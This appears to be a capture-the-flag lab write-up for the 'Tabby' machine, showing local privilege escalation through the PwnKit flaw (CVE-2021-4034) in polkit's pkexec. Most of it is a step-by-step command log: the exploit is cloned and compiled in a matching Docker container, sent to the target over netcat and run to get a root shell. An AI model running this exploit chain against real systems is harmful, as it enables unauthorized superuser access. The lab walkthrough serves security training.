CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

a vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit)

Exploit is available online

tomcat@tabby:~$ make ; gcc ; cc
 
Command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.
 
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
 
Command 'cc' not found, but can be installed with:
 
apt install gcc              # version 4:9.3.0-1ubuntu2, or
apt install clang            # version 1:10.0-50~exp1
apt install pentium-builder  # version 0.21ubuntu1
apt install tcc              # version 0.9.27-8
 
Ask your administrator to install one of them.

The target system doesn’t appear to have compilers installed. PEAS gave out a false-positive information

Opting out to remote compilation

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ docker run -it --entrypoint "/bin/bash" --name tabby ubuntu:20.04  
root@bab8b16d0a2c:/# ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Starting a Docker container to match the target system as well as the glibc version

root@bab8b16d0a2c:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd root

Installing necessary packages

root@bab8b16d0a2c:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 749.00 KiB/s, done.

Downloading the exploit package

root@bab8b16d0a2c:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compile

root@bab8b16d0a2c:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@bab8b16d0a2c:~# nc 10.10.10.194 2222 < ./CVE-2021-4034.tar.gz
tomcat@tabby:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.16.5 56392

Delivery complete

Exploitation

tomcat@tabby:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Opening up the compiled exploit package

tomcat@tabby:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
tabby
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.194  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:7b:bb  txqueuelen 1000  (Ethernet)
        RX packets 2503197  bytes 409923556 (409.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2553538  bytes 1291405025 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 25953  bytes 2019645 (2.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25953  bytes 2019645 (2.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lxdbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.219.239.1  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::216:3eff:fe96:99ed  prefixlen 64  scopeid 0x20<link>
        inet6 fd42:5a1c:7ce3:6a6c::1  prefixlen 64  scopeid 0x0<global>
        ether 00:16:3e:96:99:ed  txqueuelen 1000  (Ethernet)
        RX packets 15  bytes 1516 (1.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 3934 (3.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth05df50ac: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 9a:59:6f:92:8f:ff  txqueuelen 1000  (Ethernet)
        RX packets 15  bytes 1726 (1.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 3934 (3.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

InfoSec LAB

Explorer

Tabby_Privilege_Escalation_2

CVE-2021-4034

exploit (pwnkit)

Docker Exploit Development

Exploitation

Interactive Graph View

Table of Contents

Backlinks